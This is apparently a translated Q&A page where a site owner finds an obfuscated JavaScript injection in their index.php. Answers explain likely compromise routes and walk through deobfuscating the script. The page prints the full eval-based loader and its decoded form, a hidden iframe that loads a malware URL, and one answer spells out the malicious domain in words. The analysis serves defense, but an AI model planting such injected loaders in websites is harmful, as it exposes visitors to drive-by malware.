1

私はサイトを持っています。私のサイトは昨日困難でした。GoogleChromeで開くと、私のサイトの代わりにこのページが表示されます。

Warning: Visiting this site may harm your computer!
The website at http:... appears to host malware - Software that can hurt your 
computer or otherwise operate without your consent.
....

Chromeでページのソースを表示したところ、次のスクリプトがコードの最後に表示されました(後)。

 echo ""; echo "<script>try{if(window.document)window[\"document\"][\"body\"]=\"123\"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v[\"document\"][\"bo\"+\"dy\"]=\"123\"}catch(gfdnfdgber){m=123;if((alert+\"\").indexOf(\"n\"+\"a\"+\"ti\"+\"ve\")!==-1)ev=window[\"eval\"];}}
n=[\"9\",\"9\",\"45\",\"42\",\"17\",\"1f\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"17\",\"41\",\"48\",\"4f\",\"41\",\"17\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"4j\",\"4e\",\"45\",\"4g\",\"41\",\"1f\",\"19\",\"2a\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"17\",\"4f\",\"4e\",\"3o\",\"2b\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"17\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"2b\",\"1e\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"28\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"29\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"28\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"29\",\"48\",\"41\",\"42\",\"4g\",\"28\",\"1n\",\"29\",\"4g\",\"4b\",\"4c\",\"28\",\"1n\",\"29\",\"1e\",\"2c\",\"2a\",\"1m\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"2c\",\"19\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"d\",\"9\",\"9\",\"42\",\"4h\",\"4a\",\"3o\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"4i\",\"3m\",\"4e\",\"17\",\"42\",\"17\",\"2b\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"3o\",\"4e\",\"41\",\"3m\",\"4g\",\"41\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"1f\",\"1e\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4f\",\"4e\",\"3o\",\"1e\",\"1j\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"2b\",\"1e\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"2b\",\"1e\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"48\",\"41\",\"42\",\"4g\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4g\",\"4b\",\"4c\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1l\",\"3m\",\"4c\",\"4c\",\"41\",\"4a\",\"40\",\"2h\",\"44\",\"45\",\"48\",\"40\",\"1f\",\"42\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\"];h=2;s=\"\";if(m)for(i=0;i-631!=0;i++){k=i;if(window[\"document\"])s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(v)ev(z)}}}</script>";

注このスクリプトは、以前は私のコードに含まれていませんでした。これは何ですか?!index.php私のファイルにはどのように書かれていましたか?!

4

3 に答える 3

3

あなたのウェブサイトは危険にさらされました。それがどのように起こったかは、通常、次のシナリオの1つです。

1)Windowsを使用している人にFTPでドキュメントルートへのアクセスを許可し、その人のコンピュータがFTPクライアント構成からFTPパスワードを回復するウイルスに感染した(パスワード機能を覚えている)

2)誰かがFTPのパスワードを推測した

3)システム全体が危険にさらされる可能性があります

4)一部のスクリプト/アプリケーションは脆弱です(@Konerakが述べたように)

それが1)、2)、または3番目の理由であるかどうかを確認するには、FTPサーバーのログを調べてください-proftpdそれ/var/log/proftpd/xferlogは私のDebianシステム上にあるためです

FTPの問題の1つである場合は、FTPパスワードをすぐに変更し、すべてのクライアントでウイルス対策を実行して、新しいパスワードを配布します。Webサイトをクリーンアップするには、通常、問題のある文字列を検索して、ドキュメントルート内のすべてのファイルから削除するだけで十分です。これは通常、感染したすべてのファイルで同じ文字列です。javascriptファイルも感染していることに注意してください(*.js

Webサイトに脆弱なスクリプトがある場合は、index.phpの変更時刻を調べ、アクセスログで対応するヒットを見つけることでスクリプトを特定できます。通常、POSTメソッドまたはトリッキーなGET引数があります(ログに表示されます)

于 2012-11-17T09:13:17.547 に答える
2

はい、もちろん:

あなたのページがあなたの知らないうちに変更された場合、あなたのサイトに対するエクスプロイトは確かにありました。

HOWを考慮して、を発見するかについて少し試してみます。

このコード化されたウイルスを確認し、詳細を知るためにphp、コマンドラインから実行できます。

1.不正なコードをスクリプトにコピーし、phpタグで囲みます。

cat << eof > badscript
<?php
echo ""; echo "<script>try{if(window.doc....
n=[\"9\",\"9\",\"45\",\"42\",\"1
?>

2.最初の翻訳をphp:で行います

php <badscript >badscript2

javascriptでエンコードされたウイルスbadscript2が含まれるようになりました

<script>try{if(window.document)window["document"]["body"]="1...
n=["9","9","45","42","17"...;if(v)ev(z)}}}</script>

この小さなスクリプトを読んだ後(htmlタグを付けないでください):

sed < badscript2 -e 's/<\/\?script>//g' >badscript3

3. javascriptコードの読み取りはほとんどありません(私はemacsを使用しています)

rename s/$/.js/ badscript3 
emacs badscript3.js

...いくつかのフォーマット操作...保存...

sed <badscript3.js -e 's/\t/        /g;s/^/    /;s/^\(.\{76\}\).*$/\1.../' 
try{
    if (window.document) window["document"]["body"]="123"}
catch (bawetawe) { 
    if(window.document){
        v=window;
        try{fawbe--}catch(afnwenew){
            try{(v+v)()}catch(gngrthn){
                try{
                    if(020===0x10) v["document"]["bo"+"dy"]="123"
                }catch(gfdnfdgber){
                    m=123;
                    if((alert+"").indexOf("n"+"a"+"ti"+"ve")!==-1) 
                        ev=window["eval"];
                }
            }
            n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41"...
            h=2;
            s="";
            if(m)for(i=0;i-631!=0;i++){
                k=i;
                if(window["document"])
                    s+=String.fromCharCode(parseInt(n[i],25));
            }
            z=s;
            if(v)ev(z)
        }
    }
}

したがって、興味深い部分はとからn=[...であることがわかりますev(z)。このために、私はMozillaのSpidermonkeyバイナリツールを使用しますsmjs::

smjs最初の(読み取り可能な)部分と、windowまたはなどdocumentのコマンドラインで機能しないテストを除外し、最後の操作変更した後(最初の部分では、よりsmjsの適切な関数(私は:;-を選択)のように定義されています) 、次のようになります。送信先:evev=window.evalprint()smjs

n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","...
h=2;
s="";
for(i=0;i-631!=0;i++){
    k=i;
    s+=String.fromCharCode(parseInt(n[i],25));
}
z=s;
print(z);

4.最後にこれを見せてください:

smjs < badscript3.js >badscript4.js
emacs badscript4.js

あれは:

if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe
      src='http:  --  censored virus link -- .php' width='10' height='10'
      style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http: --  censored virus link -- keen.php');
f.style.visibility='hidden';f.style.position='absolute';
f.style.left='0';f.style.top='0';
f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

cut'n past注:リンクを検閲したリスクを最小限に抑えるために、最初はウイルスを指していた:http: slash slash ragoose.ipq.co slash correcting slash imagine-ready_enter_keen.php

気をつけて、楽しんでください!

于 2012-11-17T10:39:09.287 に答える
1

共有ホスティングを何度も行っているときに、これが発生しました。通常、それはあなたまたはあなたのマシン上の他の誰かによる脆弱なスクリプトであり、予測可能なファイルパスを探してファイルに追加することができます。

/home/user1/public_html/index.php for example is very predictable.

したがって、この脆弱性により、誰かが実行して各ディレクトリ"ls /home/"を検索する可能性があります。./public_html/index.php多くの場合、そのディレクトリにCDを挿入できなくても、これらのファイルを開くことができます。

もう1つのシナリオは、サイトまたは他のドメインの1つに脆弱性があり、任意のサブディレクトリへの書き込みアクセス(通常はWebサーバーが所有されているため)を許可することです。

于 2012-11-17T09:23:06.273 に答える